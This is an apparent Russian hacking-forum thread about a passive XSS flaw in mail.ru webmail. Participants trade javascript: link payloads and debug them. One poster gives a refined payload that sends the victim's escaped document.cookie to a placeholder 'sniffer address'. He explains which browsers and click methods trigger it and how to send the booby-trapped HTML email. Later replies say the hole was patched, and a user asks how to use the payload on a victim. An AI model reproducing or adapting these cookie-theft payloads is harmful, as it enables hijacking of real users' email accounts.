Только что нашел свежайшую XSS на mail.ru (пассивная):

<a href=javascript:alert('XSS')>Текст</a>

Ne rabotaet!

http://1intro.info/ne%20pashet.jpg

У меня сработало... хз, ща проверю снова.

http://cskacrazyfan.data.bg/screen1.bmp
http://cskacrazyfan.data.bg/screen2.bmp

Вот, все получается. :)

Слушай,лутше кинь свою Xss не в зашифрованном виде

такое будет работать только в ИЕ, если мне не изменяет память.

проверил такую ссылку на локалхосте в опере-работает

Для того, чтобы оно работало, нужно отправлять письмо в HTML (да и то я не особо уверен, что фильтры не порежут)

В незашифрованном виде оно выглядит весьма банально:
<a href=javascript:alert('XSS')>Текст</a>

Все сработало на Ура!

в локалке сработало....на почте нет так как & заменилось на &amp; посылал письмо в формате htm с того же mail.ru

2Skaret
Фишка то в том, чтоб обойти фильтр. В незашифрованном виде код такой:
<a href=javascript:alert('XSS')>Текст</a>
Но такой код не выполнится, поэтому нужен такой:
<a href=javascript:alert('XSS')>Текст</a>

:)

плин мужики помогите заюзать багу )))) пишу след код и получаю глюк в Опере:
<a href=javascript:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie;>Текст</a>
открывается новое окно и никаких куков, а если правой кнопкой мышары и открыть то куки выводятся прямо в браузере!!!
помогите разобраться )

"мужики" все в Париже, а вот Я помогу тебе разобраться.

Начнем с того, что "багу" до сих пор еще не прикрыли, это свидетельствует о степени ее опасности. При том, что обычная пассивка на мыл ру, запощенная в этот раздел, держится дай бог неделю, косвенно можно предположить, какова цена этой "свежей" "баги" (с т.зр. саппорта через призму всех отписавшихся до меня :cool: ) .

Так вот, почему ее не прикрыли... Потому что уже сравнительно давно переход по такой ссылке на мыл ру опосредуется принудительно вставляемым в тег ссылки атрибутом target c параметром "_blank". Это значит, что перед тем, как попасть в адресную строку (на выполнение), твой код javascript:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie; будет помещен на новую страницу. Это все равно что самостоятельно открыть новую страницу, вписать в адресную строку этот код и ждать прихода кук ! :confused: А алерты, конечно, пойдут! Только вот, видимо, очень плохо доходит инфа, что если где-то вдруг выскочил алерт, это не значит, что найдена бага XSS. :)
В отличие от этого, когда ты нажимаешь правой кнопкой "открыть", браузер сам берет ссылку с псевдоскриптом и выполняет его непосредственно в контексте того домена, откуда ее взял. Атрибут target при этом игнорируется. Вот почему ты видишь свои куки в этом случае. Но в ИЕ это не проходит, а в ФФ ссылка правой кнопкой открывается только в новом окне. Остается из популярных только Опера.

Теперь мы пойдем дальше и попробуем выжать из ситуации максимум :cool:

Когда ссылка, нажатая обычным образом или через правую кнопку, открывается в новом окне, где нет никаких картинок, нет смысла обращаться к первой картинке на странице, используя document.images[0].src ! Заменям это обычным динамическим созданием объекта картинки: img=new Image(); img.src
Далее, если посмотреть исходный код открывшейся страницы (при нажатии на ссылку обычным образом), там мы увидим, что на станице отобразилось все, что идет после src= , то есть адрес твоего сниффа. Используем это, вставляя на страницу код, отсылающий куки.
XSS примет вид:
<a href="javascript:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>

Объясняю:
- на голую страницу помещается тег img c адресом сниффера
- но к этому адресу динамически прибавляются куки. Однако, куки разделены пробелами, в связи с чем может образоваться обрыв строки и на снифф отправится только первая кука. Мы снимаем эту проблему, преобразуя строку куки функцией escape (обратная - unescape(строка)).
- и, наконец, закрываем тег img

Обычным нажатием этот код будет работать только в ФФ.
В Опере этот код сработает, только если открыть ссылку правой кнопкой.
В ИЕ не сработает.

Письмо отправлять в штмл не с маил ру.

Посмотрим теперь, как быстро прикроют эту "багу". :D

LeverOne, огромное тебе спасибо разобрался. к репе ++

а вот и баг прикрыли))

и сколько она всего прожила? :)

полюбому у них шахтёр капает на античате все дыры :) и закрывают потом их надо банить :d

Этот проект является попыткой показать пользователям насколько уязвимыми они являются. Что можно узнать о человеке, который просто разговаривает в чате, по ICQ, Odigo. Так же описаны проблемы анонимности и конфиденциальности при работе с сетью Internet...
Античат - прежде всего сайт по безопасности (читай название темы), а не блекхат проект. Кому надо (например mail.ru), смотрят и латают оперативно дырки. В этом суть

этой багой год назад пытались мой ящик взломать, благо я всегда ява скрипты отрубаю

Давайте вы мне подробнее раскажете:
Вот код:
<a href="javascript:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>

Вопрос № 1:
javascript Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?

яое, ты круче всех чуваг.

Давайте вы мне подробнее раскажете:
Вот код:
<a href="javascript:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>

Вопрос № 1:
javascript Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?
Баг уже прикрыли))) Можешь не пытаться даже